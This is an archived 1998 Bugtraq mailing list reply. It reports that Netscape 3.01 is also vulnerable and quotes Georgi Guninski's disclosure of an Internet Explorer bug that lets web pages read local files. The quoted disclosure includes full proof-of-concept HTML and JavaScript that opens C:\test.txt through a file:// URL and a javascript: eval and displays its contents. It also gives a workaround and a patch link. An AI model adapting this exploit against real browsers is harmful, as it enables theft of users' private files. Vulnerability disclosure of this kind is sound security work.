Bugtraq mailing list archives
Re: IE can read local files
From: robing () TOTAL NET (Mike Dion)
Date: Sat, 5 Sep 1998 13:36:29 +0200
Netscape Navigator Version 3.01 is vulnerable too... I didn't test any other Netscape versions...

At 04:33 98-09-05 -0400, Georgi Guninski wrote:
There is a bug in Internet Explorer 3, 4.0, 4.01 (for version information see Microsoft's info below), which allows a specially designed web page to read text or HTML files from the user's computer and send their contents to an arbitrary host, even if the user is behind a firewall. The bug uses Javascript and the file name and location must be known.

Another way to exploit this bug is to send a specially designed message to an Outlook Express/IE4 user.

Demonstration of this is available at:
http://www.geocities.com/ResearchTriangle/1711/good-read.html

Workaround: Disable Javascript.

Microsoft has released a patch at:
http://www.microsoft.com/security/bulletins/ms98-013.htm
Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711

The source of the page:

----Cut here---
<HTML>
<HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD>
<BODY>
This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other versions), which allows reading text or HTML file on the user's machine.
<B>Create the file c:\test.txt</B> and its contents are shown in a message box. The file may be sent to an arbitrary server even if behind a firewall.
<BR>
To test it, you need Javascript enabled.
<BR>
This file is created by <A HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A>
<SCRIPT LANGUAGE="JAVASCRIPT">
alert("This page demonstrates reading the file C:\\test.txt (you may need to create a short file to view it)");
var x=window.open('file://C:/test.txt');
x.navigate("javascript:eval(\"var a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\") ");
</SCRIPT>
</BODY>
</HTML>